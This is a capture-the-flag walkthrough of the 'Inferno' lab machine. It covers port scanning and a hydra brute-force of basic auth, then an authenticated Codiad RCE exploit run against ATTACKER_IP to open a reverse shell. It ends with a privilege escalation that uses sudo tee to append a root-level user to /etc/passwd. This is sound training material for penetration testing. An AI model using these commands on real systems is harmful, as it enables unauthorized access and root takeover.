Inferno

January 16, 2022 5 minute read

	Difficulty		IP Address		Room Link
	Medium		10.10.93.17		Inferno

[ Locate and find local.txt ]

Let’s start things off with a full nmap scan on the target machine.

sudo nmap -sC -sV -vv -T4 -p- 10.10.93.17

Results:

PORT      STATE SERVICE           REASON         VERSION
21/tcp    open  ftp?              syn-ack ttl 61
22/tcp    open  ssh               syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
[REDACTED]
23/tcp    open  telnet?           syn-ack ttl 61
25/tcp    open  smtp?             syn-ack ttl 61
|_smtp-commands: Couldn't establish connection on port 25
80/tcp    open  http              syn-ack ttl 61 Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Dante's Inferno
88/tcp    open  kerberos-sec?     syn-ack ttl 61
106/tcp   open  pop3pw?           syn-ack ttl 61
110/tcp   open  pop3?             syn-ack ttl 61
194/tcp   open  irc?              syn-ack ttl 61
...
...
...
30865/tcp open  unknown           syn-ack ttl 61
57000/tcp open  unknown           syn-ack ttl 61
60177/tcp open  unknown           syn-ack ttl 61
60179/tcp open  unknown           syn-ack ttl 61
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There are a whole bunch of ports open (90 in fact), but only 2 of them were actually legitimate: 22 (SSH) and 80 (HTTP)

Let’s check out the HTTP website:

screenshot1

We have a website with a picture depicting the nine circles of Hell as described in the famous 14th century poem, Dante’s Inferno. There is also an excerpt (in latin) from the poem at the top of the page.

I first tried to do some manual enumeration, such as checking the source code and the robots.txt file. However, I was unable to find anything fruitful.

Next, I ran a Gobuster scan to enumerate any hidden directories:

gobuster dir -u http://10.10.93.17/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50

screenshot2

After a short while, it was able to find out a /inferno directory!

Let’s take a look at this directory:

screenshot3

We are asked to authenticate ourselves.

I tried common default credentials like admin:admin, but they didn’t work. Let’s use hydra to run a dictionary attack! We’ll use admin as our username as that is the most common administrator username:

hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 64 -f 10.10.93.17 http-get /inferno

screenshot4

Nice! Hydra managed to find the admin’s password:

dante1

We can now log into /inferno:

screenshot5

And we get another login screen…

It seems like the machine is running Codiad.

Codiad is an open source, web-based, cloud IDE and code editor with minimal footprint and requirements.

Fortunately for us, the admin reuses their credentials! Hence, we can simply use:

admin:dante1

to log in:

screenshot6

We are now brought to the Codiad dashboard.

There were many files and folders (as seen on the left), but I was unable to find anything interesting amongst them.

I then tried to upload a file of my own, but it seems that the project has been set to read-only mode:

screenshot7

Let’s use searchsploit to look for any exploits that exist for Codiad:

searchsploit codiad

screenshot8

There are a bunch of exploits that allow us to achieve remote code execution on the machine. They do require us to be authenticated, which is no issue as we already have the administrator’s credentials. Also, I did some research online and found out that 2.8.4 is the latest version of Codiad. Hence, these exploits should work for us!

Let’s use the first exploit: Codiad 2.8.4 - Remote Code Execution (Authenticated)

To run this exploit, we use the following command:

python3 49705.py http://admin:dante1@10.10.93.17/inferno/ admin dante1 ATTACKER_IP 4444 linux

Notice our URL provided is http://admin:dante1@10.10.93.17. This is to pass the HTTP basic authentication when trying to access /inferno.

The exploit will prompt us to run 2 separate commands on 2 other terminals. Our setup should look like this:

screenshot9

Once we hit ‘Y’, the exploit will run and open a reverse shell for us!

screenshot10

We’re in

After awhile, I noticed that there was a cronjob that was logging me out every 1 minute. This meant that we had to keep re-running the exploit and logging back in.

(Apparently the creator of the room intentionally made it this way so as to simulate hell lmao)

Looking around the machine, we find out that there is a user called dante:

screenshot11

dante’s home directory contains local.txt, but we do not have the permissions to access it:

screenshot12

I dug through dante’s directory and realized that it was filled with different Linux binaries that have been renamed. For example, in /Desktop, we have a binary called inferno.txt. From the help menu of this binary, we know that it is actually rm:

screenshot13

Fortunately for us, we don’t actually have to use any of these renamed binaries as there’s actually a hidden file called .download.dat located in /Downloads:

screenshot14

.download.dat contained a message that has been converted to hex. Let’s convert it back using CyberChef:

screenshot15

The decoded message actually contains dante’s credentials:

dante : V1rg1l10h3lpm3

With that, we can log into dante’s account directly via SSH:

screenshot16

We can then obtain local.txt from dante’s home directory:

screenshot17

[ Locate and find proof.txt ]

Now let’s find a way to escalate our privileges.

The first thing I did was to check dante’s sudo privileges:

screenshot18

It looks like we can run tee as root! We can find a way to exploit this from GTFOBins:

screenshot19

With tee, we’ll be able to append any text we want to any file on the system.

One way we can abuse this is to create a new user with root privileges by appending the following line to the /etc/passwd file:

root2:PASSWORD_HERE:0:0:root:/root:/bin/bash

Once added to /etc/passwd, there will be a new user called root2 which will have a UID and GID of 0 (root). We’ll then be able to log into this account as we control the password!

To generate a password of our choice, we can use openssl:

openssl passwd -1 test123

(-1 indicates to use the MD5 based BSD password algorithm 1)

Here, I’m generating a hash of the password ‘test123’:

screenshot20

Thus, the final line that we will append to /etc/passwd is:

root2:$1$VXrlEbBc$JQ890LMMpJXdeVQeJLrFJ/:0:0:root:/root:/bin/bash

From my research, I found out that we can also leave the password field in our /etc/password entry empty. This allows us to log into our created account without a password.

However this will not work if the machine has disabled passwordless accounts completely, which is the case here. Hence, I had no choice but to set up a password.

With everything set up, let’s use tee to add the line:

LFILE=/etc/passwd
echo 'root2:$1$VXrlEbBc$JQ890LMMpJXdeVQeJLrFJ/:0:0:root:/root:/bin/bash' | sudo tee -a "$LFILE"

screenshot21

We can see that our payload has been successfully appended into /etc/passwd!

With that, we can log into our newly-created root2 account:

su root2

screenshot22

root2 will have root privileges as its UID and GID are both 0. Thus, we can simply navigate to /root and obtain proof.txt:

screenshot23

Nicholas Leu

Inferno

[ Locate and find local.txt ]

[ Locate and find proof.txt ]

You May Also Enjoy

Squashed

Netmon

Blue

Lame